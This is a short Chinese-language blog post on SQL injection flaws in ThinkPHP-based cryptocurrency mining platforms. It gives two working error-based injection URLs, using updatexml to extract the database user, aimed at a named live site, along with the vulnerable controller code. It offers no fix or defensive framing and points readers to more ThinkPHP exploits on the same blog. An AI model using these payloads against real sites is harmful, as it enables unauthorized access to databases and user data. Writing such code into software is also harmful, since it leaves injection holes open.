某挖矿系统(各类币)一些通用漏洞

摘要

某挖矿系统漏洞

网上很多挖矿系统都是由thinkphp框架开发,框架本身是没什么漏洞的,但是到了开发的手上那就不一样了,开发稍微不当,可能就会导致漏洞的产生。

前几天发表了这篇文章,thinkphp一些版本的通杀漏洞payload 漏洞方面也是来源这里。

1.jpg


2.jpg



第一个漏洞


http://appbtc.com/index.php/index/shop/index?gid[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23



漏洞片段


public function index(){
   $items = M('goods');
   $gao = C('max_danjia');
   $rmb_hl = C('rmb_hl');
   $itemsdata = $items->find($_GET['gid']);
   $spjiage = sprintf("%.2f", $itemsdata['goldprice'] / $rmb_hl / $gao);
clipboard.png


4.png


第二个漏洞


//公告详细页
public function newsView(){
    //$data['truename']     = I('post.truename','','htmlspecialchars');
         // $id = I('id');
   $new = M('announce')->where(array('id'=>I('id')))->find();
   $this->assign('new',$new);
   $this->display();
}

 
http://appbtc.com/index.php/index/new/newsView?id[0]=exp&id[1]%20==1))%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23


55.jpg



不懂? 去研究一下 本博客的 有关thinkphp漏洞方面的文章。

目前评论:0 条

发表评论